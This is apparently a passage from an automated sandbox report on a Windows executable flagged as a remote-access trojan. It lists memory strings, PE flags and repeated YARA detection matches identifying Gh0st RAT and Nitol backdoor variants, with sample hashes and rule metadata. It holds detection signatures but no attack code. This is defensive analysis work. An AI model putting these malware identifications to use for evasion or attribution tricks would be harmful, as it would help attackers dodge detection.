                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: String function: 027324BF appears 39 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: String function: 0047B47C appears 76 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: String function: 0236680D appears 50 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: String function: 00479240 appears 32 times
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521297160.000000000266D000.00000040.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameadvapi32.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521410677.0000000002A0E000.00000040.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameKernelbase.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521144245.0000000002578000.00000040.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520956038.000000000233C000.00000040.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamekernel32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2332288863.000000000061B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameadvapi32.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521297160.000000000267C000.00000040.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameiphlpapi.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2223717486.0000000000A95000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamekernel32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521558288.0000000002B03000.00000040.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2261759713.0000000002609000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2160765089.0000000002387000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2223717486.0000000000A03000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2197052330.0000000002604000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameKernelbase.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520956038.00000000022EC000.00000040.00000020.00020000.00000000.sdmp | Binary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2912424952.00000000027D7000.00000040.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2909171827.00000000023C2000.00000040.00000020.00020000.00000000.sdmp | Binary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2909171827.0000000002412000.00000040.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamekernel32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2686941457.00000000006E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913041831.0000000002C6D000.00000040.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameKernelbase.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2720432186.00000000024F2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2686941457.000000000077B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamekernel32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2910146848.000000000256B000.00000040.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameiphlpapi.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2609394899.0000000002614000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2796933858.00000000007C0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameadvapi32.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2912752894.0000000002907000.00000040.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2910146848.000000000255D000.00000040.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameadvapi32.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2660700372.0000000002861000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameKernelbase.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946604927.000000000250C000.00000040.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946770671.000000000260B000.00000040.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameiphlpapi.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2799524772.0000000002597000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946450413.000000000238F000.00000040.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamekernel32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946883460.0000000002999000.00000040.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameKernelbase.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946450413.000000000233F000.00000040.00000020.00020000.00000000.sdmp | Binary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2739388386.0000000002592000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameKernelbase.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946770671.00000000025FD000.00000040.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameadvapi32.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947054584.0000000002A94000.00000040.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2762218547.0000000002218000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2884820798.000000000087F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameadvapi32.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2762218547.00000000022AA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamekernel32j% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2701196874.0000000002336000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                Source: 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
